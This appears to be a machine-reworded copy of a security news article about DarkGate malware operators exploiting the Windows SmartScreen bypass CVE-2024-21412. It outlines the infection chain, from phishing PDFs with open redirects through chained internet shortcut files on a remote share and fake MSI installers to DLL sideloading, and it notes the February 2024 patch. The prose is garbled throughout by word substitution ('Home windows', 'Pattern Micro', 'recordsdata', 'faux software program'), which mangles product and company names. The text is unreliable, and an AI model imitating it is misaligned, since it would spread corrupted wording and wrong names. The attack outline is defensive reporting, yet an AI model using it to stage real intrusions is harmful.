A brand new wave of assaults by the DarkGate malware operation exploits a now-fixed Home windows Defender SmartScreen vulnerability to bypass security checks and robotically set up faux software program installers.
SmartScreen is a Home windows security characteristic that shows a warning when customers try to run unrecognized or suspicious recordsdata downloaded from the web.
The flaw tracked as CVE-2024-21412 is a Home windows Defender SmartScreen flaw that permits specifically crafted downloaded recordsdata to bypass these security warnings.
Attackers can exploit the flaw by making a Home windows Web shortcut (.url file) that factors to a different .url file hosted on a distant SMB share, which might trigger the file on the last location to be executed robotically.
Microsoft fastened the flaw in mid-February, with Pattern Micro disclosing that the financially motivated Water Hydra hacking group beforehand exploited it as a zero-day to drop their DarkMe malware onto merchants’ techniques.
At the moment, Pattern Micro analysts reported that DarkGate operators are exploiting the identical flaw to enhance their possibilities of success (an infection) on focused techniques.
This can be a vital improvement for the malware, which, along with Pikabot, has crammed the void created by QBot’s disruption final summer time and is utilized by a number of cybercriminals for malware distribution.
DarkGate assault particulars
The assault begins with a malicious e-mail that features a PDF attachment with hyperlinks that make the most of open redirects from Google DoubleClick Digital Advertising (DDM) providers to bypass e-mail security checks.
When a sufferer clicks on the hyperlink, they’re redirected to a compromised net server that hosts an web shortcut file. This shortcut file (.url) hyperlinks to a second shortcut file hosted on an attacker-controlled WebDAV server.
Supply: Pattern Micro
Utilizing one Home windows Shortcut to open a second Shortcut on a distant server successfully exploits the CVE-2024-21412 flaw, inflicting a malicious MSI file to execute robotically on the gadget.
Supply: Pattern Micro
These MSI recordsdata masqueraded as authentic software program from NVIDIA, the Apple iTunes app, or Notion.
Upon execution of the MSI installer, one other DLL sideloading flaw involving the “libcef.dll” file and a loader named “sqlite3.dll” will decrypt and execute the DarkGate malware payload on the system.
As soon as it is initialized, the malware can steal knowledge, fetch further payloads and inject them into working processes, carry out key logging, and provides attackers real-time distant entry.
The complicated and multi-step an infection chain employed by DarkGate operators since mid-January 2024 is summarized within the beneath diagram:
Supply: Pattern Micro
Pattern Micro says this marketing campaign employs DarkGate model 6.1.7, which, in comparison with the older model 5, options XOR-encrypted configuration, new config choices, and updates on the command and management (C2) values.
The configuration parameters out there in DarkGate 6 allow its operators to find out numerous operational ways and evasion strategies, akin to enabling startup persistence or specifying minimal disk storage and RAM measurement to evade evaluation environments.
Supply: Pattern Micro
Step one to mitigate the chance from these assaults can be to use Microsoft’s February 2024 Patch Tuesday replace, which fixes CVE-2024-21412.
Pattern Micro has revealed the entire record of the indications of compromise (IoCs) for this DarkGate marketing campaign on this webpage.
